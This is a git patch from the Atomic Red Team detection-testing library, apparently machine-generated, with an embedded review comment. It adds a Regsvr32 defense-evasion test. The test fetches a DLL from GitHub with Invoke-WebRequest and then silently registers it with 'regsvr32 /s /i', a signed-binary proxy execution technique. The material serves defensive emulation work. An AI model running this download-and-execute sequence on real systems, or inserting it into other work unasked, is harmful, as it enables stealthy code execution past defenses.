From e922799d431cef2d24691ee970bd6b84c0bb7838 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator
Date: Tue, 9 Feb 2021 18:16:39 +0000
Subject: [PATCH] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
---
atomics/Indexes/Indexes-CSV/index.csv | 1 +
atomics/Indexes/Indexes-CSV/windows-index.csv | 1 +
atomics/Indexes/Indexes-Markdown/index.md | 1 +
.../Indexes/Indexes-Markdown/windows-index.md | 1 +
atomics/Indexes/index.yaml | 31 +++++++++++++
atomics/T1218.010/T1218.010.md | 46 +++++++++++++++++++
6 files changed, 81 insertions(+)
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index e31635e2..466ec3ec 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -470,6 +470,7 @@ defense-evasion,T1218.010,Regsvr32,1,Regsvr32 local COM scriptlet execution,449a
 defense-evasion,T1218.010,Regsvr32,2,Regsvr32 remote COM scriptlet execution,c9d0c4ef-8a96-4794-a75b-3d3a5e6f2a36,command_prompt
 defense-evasion,T1218.010,Regsvr32,3,Regsvr32 local DLL execution,08ffca73-9a3d-471a-aeb0-68b4aa3ab37b,command_prompt
 defense-evasion,T1218.010,Regsvr32,4,Regsvr32 Registering Non DLL,1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421,command_prompt
+defense-evasion,T1218.010,Regsvr32,5,Regsvr32 Silent DLL Install Call DllRegisterServer,9d71c492-ea2e-4c08-af16-c6994cdf029f,command_prompt
 defense-evasion,T1036.003,Rename System Utilities,1,Masquerading as Windows LSASS process,5ba5a3d1-cf3c-4499-968a-a93155d1f717,command_prompt
 defense-evasion,T1036.003,Rename System Utilities,2,Masquerading as Linux crond process.,a315bfff-7a98-403b-b442-2ea1b255e556,sh
 defense-evasion,T1036.003,Rename System Utilities,3,Masquerading - cscript.exe running as notepad.exe,3a2a578b-0a01-46e4-92e3-62e2859b42f0,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index c1d95468..df92f2e3 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -276,6 +276,7 @@ defense-evasion,T1218.010,Regsvr32,1,Regsvr32 local COM scriptlet execution,449a
 defense-evasion,T1218.010,Regsvr32,2,Regsvr32 remote COM scriptlet execution,c9d0c4ef-8a96-4794-a75b-3d3a5e6f2a36,command_prompt
 defense-evasion,T1218.010,Regsvr32,3,Regsvr32 local DLL execution,08ffca73-9a3d-471a-aeb0-68b4aa3ab37b,command_prompt
 defense-evasion,T1218.010,Regsvr32,4,Regsvr32 Registering Non DLL,1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421,command_prompt
+defense-evasion,T1218.010,Regsvr32,5,Regsvr32 Silent DLL Install Call DllRegisterServer,9d71c492-ea2e-4c08-af16-c6994cdf029f,command_prompt
 defense-evasion,T1036.003,Rename System Utilities,1,Masquerading as Windows LSASS process,5ba5a3d1-cf3c-4499-968a-a93155d1f717,command_prompt
 defense-evasion,T1036.003,Rename System Utilities,3,Masquerading - cscript.exe running as notepad.exe,3a2a578b-0a01-46e4-92e3-62e2859b42f0,command_prompt
 defense-evasion,T1036.003,Rename System Utilities,4,Masquerading - wscript.exe running as svchost.exe,24136435-c91a-4ede-9da1-8b284a1c1a23,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 2d4ae5e4..3a5c0299 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -862,6 +862,7 @@
 - Atomic Test #2: Regsvr32 remote COM scriptlet execution [windows]
 - Atomic Test #3: Regsvr32 local DLL execution [windows]
 - Atomic Test #4: Regsvr32 Registering Non DLL [windows]
+ - Atomic Test #5: Regsvr32 Silent DLL Install Call DllRegisterServer [windows]
 - [T1036.003 Rename System Utilities](../../T1036.003/T1036.003.md)
 - Atomic Test #1: Masquerading as Windows LSASS process [windows]
 - Atomic Test #2: Masquerading as Linux crond process. [linux]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 60726942..093a7787 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -498,6 +498,7 @@
 - Atomic Test #2: Regsvr32 remote COM scriptlet execution [windows]
 - Atomic Test #3: Regsvr32 local DLL execution [windows]
 - Atomic Test #4: Regsvr32 Registering Non DLL [windows]
+ - Atomic Test #5: Regsvr32 Silent DLL Install Call DllRegisterServer [windows]
 - [T1036.003 Rename System Utilities](../../T1036.003/T1036.003.md)
 - Atomic Test #1: Masquerading as Windows LSASS process [windows]
 - Atomic Test #3: Masquerading - cscript.exe running as notepad.exe [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 579fd975..840fc4ae 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -37850,6 +37850,37 @@ defense-evasion:
 elevation_required: false
 command: "#{regsvr32path}\\#{regsvr32name} /s #{dll_file}\n"
 cleanup_command: "#{regsvr32path}\\#{regsvr32name} /U /s #{dll_file}\n"
+ - name: Regsvr32 Silent DLL Install Call DllRegisterServer
+ auto_generated_guid: 9d71c492-ea2e-4c08-af16-c6994cdf029f
+ description: Regsvr32.exe is a command-line program used to register and unregister
+ OLE controls. Normally, an install is executed with /n to prevent calling
+ DllRegisterServer.
+ supported_platforms:
+ - windows
+ input_arguments:
+ dll_name:
+ description: Name of DLL to Install
+ type: String
+ default: PathToAtomicsFolder\T1218.010\bin\AllTheThingsx86.dll
+ regsvr32path:
+ description: Default location of Regsvr32.exe
+ type: String
+ default: C:\Windows\system32
+ regsvr32name:
+ description: Default name of Regsvr32.exe
+ type: String
+ default: regsvr32.exe
+ dependency_executor_name: powershell
+ dependencies:
+ - description: AllTheThingsx86.dll must exist on disk at specified location
+ (#{dll_name})
+ prereq_command: 'if (Test-Path #{dll_name}) {exit 0} else {exit 1}'
+ get_prereq_command: |-
+ New-Item -Type Directory (split-path #{dll_name}) -ErrorAction ignore | Out-Null
+ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/bin/AllTheThingsx86.dll" -OutFile "#{dll_name}"
+ executor:
+ command: "#{regsvr32path}\\#{regsvr32name} /s /i #{dll_name}"
+ name: command_prompt
 T1036.003:
 technique:
 external_references:
diff --git a/atomics/T1218.010/T1218.010.md b/atomics/T1218.010/T1218.010.md
index 4bf31909..043c0a8c 100644
--- a/atomics/T1218.010/T1218.010.md
+++ b/atomics/T1218.010/T1218.010.md
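Review bot: The new test #5 entry has no `cleanup_command`, while the preceding test #4 entry in this hunk's context unregisters with `/U /s`; as written, `regsvr32 /s /i` leaves whatever DllInstall/DllRegisterServer wrote behind after the test runs. Mirroring the previous entry, `cleanup_command: "#{regsvr32path}\\#{regsvr32name} /U /s /i #{dll_name}\n"` would undo both calls (worth confirming that regsvr32's /u together with /i invokes the uninstall path of DllInstall as intended). The entry also omits `elevation_required`, which test #4 states explicitly; if the DLL's DllRegisterServer writes under HKCR the test will need administrative rights, so an explicit value would avoid a misleading default. Separately, `get_prereq_command` fetches AllTheThingsx86.dll from the `master` branch with Invoke-WebRequest and the executor then registers it with no integrity check; pinning the URL to a commit and comparing `Get-FileHash` against an expected SHA-256 (placeholder `<EXPECTED_SHA256>`) before the registration step would keep the downloaded binary from drifting silently. The same content is rendered in the T1218.010.md hunk below, so the fix belongs in the technique's source YAML that both generated files are built from (not part of this diff).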
@@ -16,6 +16,8 @@ Regsvr32.exe can also be leveraged to register a COM Object used to establish pe
 - [Atomic Test #4 - Regsvr32 Registering Non DLL](#atomic-test-4---regsvr32-registering-non-dll)
+- [Atomic Test #5 - Regsvr32 Silent DLL Install Call DllRegisterServer](#atomic-test-5---regsvr32-silent-dll-install-call-dllregisterserver)
+
@@ -183,4 +185,48 @@ copy "C:\Windows\System32\shell32.dll" "#{dll_file}"
+
+
+
+## Atomic Test #5 - Regsvr32 Silent DLL Install Call DllRegisterServer
+Regsvr32.exe is a command-line program used to register and unregister OLE controls. Normally, an install is executed with /n to prevent calling DllRegisterServer.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| dll_name | Name of DLL to Install | String | PathToAtomicsFolder\T1218.010\bin\AllTheThingsx86.dll|
+| regsvr32path | Default location of Regsvr32.exe | String | C:\Windows\system32|
+| regsvr32name | Default name of Regsvr32.exe | String | regsvr32.exe|
+
+
+#### Attack Commands: Run with `command_prompt`!
+
+
+```cmd
+#{regsvr32path}\#{regsvr32name} /s /i #{dll_name}
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: AllTheThingsx86.dll must exist on disk at specified location (#{dll_name})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{dll_name}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path #{dll_name}) -ErrorAction ignore | Out-Null
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/bin/AllTheThingsx86.dll" -OutFile "#{dll_name}"
+```
+
+
+